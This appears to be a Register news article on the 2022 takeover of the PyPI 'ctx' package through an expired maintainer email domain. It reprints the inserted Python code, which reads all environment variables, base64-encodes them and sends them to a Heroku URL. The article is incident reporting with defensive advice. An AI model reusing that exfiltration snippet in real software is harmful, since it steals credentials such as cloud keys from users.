If you're using the ctx Python package, bad news: Vandal added info-stealing code

Domain associated with maintainer email expired, taken over in supply-chain attack

Updated The Python Package Index (PyPI), a repository for Python software libraries, has advised Python developers that the ctx package has been compromised.

Any installation of the software in the past ten days should be investigated to determine whether sensitive account identifiers stored in environment variables, such as cloud access keys, have been stolen.

The PyPI administrators estimate that about 27,000 malicious copies of ctx were downloaded from the registry since the rogue versions of ctx first appeared, starting around 19:18 UTC on May 14, 2022.

They add that a safe version of ctx (1.2) is a dependency of one other package, context engine. But more recent malicious versions of ctx don't appear as dependencies in any other packages analyzed by Library.io.

"The ctx hosted project on PyPI was taken over via user account compromise and replaced with a malicious project which contained runtime code which collected the content of os.environ.items() when instantiating Ctx objects," the PyPI administrators explain in a security advisory published on Tuesday. "The captured environment variables were sent as a base64 encoded query parameter to a Heroku application running at h[xx]ps://anti-theft-web.herokuapp.com."

That URL is not currently configured to respond to web requests via HTTP – presumably the app has been disabled or removed.

About half of Python libraries in PyPI may have security issues, boffins say


In a blog post on Tuesday, Internet Storm Center handler Yee Ching Tok observes that another (no longer accessible) project on GitHub – github.com/hautelook/phpass – contained the same malicious Heroku domain within its PHP code.

The ctx package, now removed from PyPI, is a Python library for accessing Python dictionaries using dot notation. It remained unchanged over the past eight years (as it remains on GitHub) until May 14, 2022. That's when the expired email domain (figlief.com) administering the PyPI account was re-registered and taken over by an unknown attacker, a supply-chain attack strategy we've recently written about in the context of JavaScript registry NPM.

A Reddit post from three days ago that announced the arrival of the new version of ctx may be from an individual involved in the package subversion. At least that's the speculation of those responding to the now deleted initial post. The Register has emailed the individual in question – whose GitHub account includes security and hacking tools – to ask about this but we've not heard back.

The exfiltration code is unsophisticated, which could indicate that the attack is more exploratory than ill-intentioned. It iterates through the environmental variables stored on the victim's machine, encodes them as base64, and appends them to a Heroku app URL as query parameters.

class Ctx(dict):
    def __init__(self):
    def sendRequest(self):
        string = ""
        for _, value in os.environ.items():
            string += value+" "
        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')
        response = requests.get("hxxps://anti-theft-web.herokuapp.com/hacked/"+base64_message)

A post on Monday by a different Reddit user appears to be among the first to raise the alarm.

Those overseeing PyPI say domain takeovers represent a known attack vector and that PyPI's defense against this involves disabling "verified" email status – required to process a password update – if a PyPI email to the account bounces. But triggering de-verification requires PyPI to send an email inquiry to the expired domain between the time of expiration and the domain takeover. And that doesn't appear to have happened.

The Pythonistas note that they could perform this sort of analysis on an ongoing basis and freeze accounts associated with expired or nearly expired domains, but that this would be "at the cost of increased support burden on the team of PyPI moderators and admins."

The PyPI admins recommend enabling multi-factor authentication for PyPI accounts and using version-pinning and hash-checking mode for greater security. ®

Updated to add

The person who altered the contents of ctx has spoken out, saying they not only tampered with the Python library but also PHPass. The netizen said they got 1,000 environment variables from the vandalized dependencies, though insisted there was no malicious intent and that it was an attempt to demonstrate insecurities with third-party packages.


Broader topics

Other stories you might like

  • 1Password's Insights tool to help admins monitor users' security practices
    Find the clown who chose 'password' as a password and make things right

    1Password, the Toronto-based maker of the identically named password manager, is adding a security analysis and advice tool called Insights from 1Password to its business-oriented product.

    Available to 1Password Business customers, Insights takes the form of a menu addition to the right-hand column of the application window. Clicking on the "Insights" option presents a dashboard for checking on data breaches, password health, and team usage of 1Password throughout an organization.

    "We designed Insights from 1Password to give IT and security admins broader visibility into potential security risks so businesses improve their understanding of the threats posed by employee behavior, and have clear steps to mitigate those issues," said Jeff Shiner, CEO of 1Password, in a statement.

    Continue reading
  • Mega's unbreakable encryption proves to be anything but
    Boffins devise five attacks to expose private files

    Mega, the New Zealand-based file-sharing biz co-founded a decade ago by Kim Dotcom, promotes its "privacy by design" and user-controlled encryption keys to claim that data stored on Mega's servers can only be accessed by customers, even if its main system is taken over by law enforcement or others.

    The design of the service, however, falls short of that promise thanks to poorly implemented encryption. Cryptography experts at ETH Zurich in Switzerland on Tuesday published a paper describing five possible attacks that can compromise the confidentiality of users' files.

    The paper [PDF], titled "Mega: Malleable Encryption Goes Awry," by ETH cryptography researchers Matilda Backendal and Miro Haller, and computer science professor Kenneth Paterson, identifies "significant shortcomings in Mega’s cryptographic architecture" that allow Mega, or those able to mount a TLS MITM attack on Mega's client software, to access user files.

    Continue reading
  • Google battles bots, puts Workspace admins on alert
    No security alert fatigue here

    Google has added API security tools and Workspace (formerly G-Suite) admin alerts about potentially risky configuration changes such as super admin passwords resets.

    The API capabilities – aptly named "Advanced API Security" – are built on top of Apigee, the API management platform that the web giant bought for $625 million six years ago.

    As API data makes up an increasing amount of internet traffic – Cloudflare says more than 50 percent of all of the traffic it processes is API based, and it's growing twice as fast as traditional web traffic – API security becomes more important to enterprises. Malicious actors can use API calls to bypass network security measures and connect directly to backend systems or launch DDoS attacks.

    Continue reading

Biting the hand that feeds IT © 1998–2022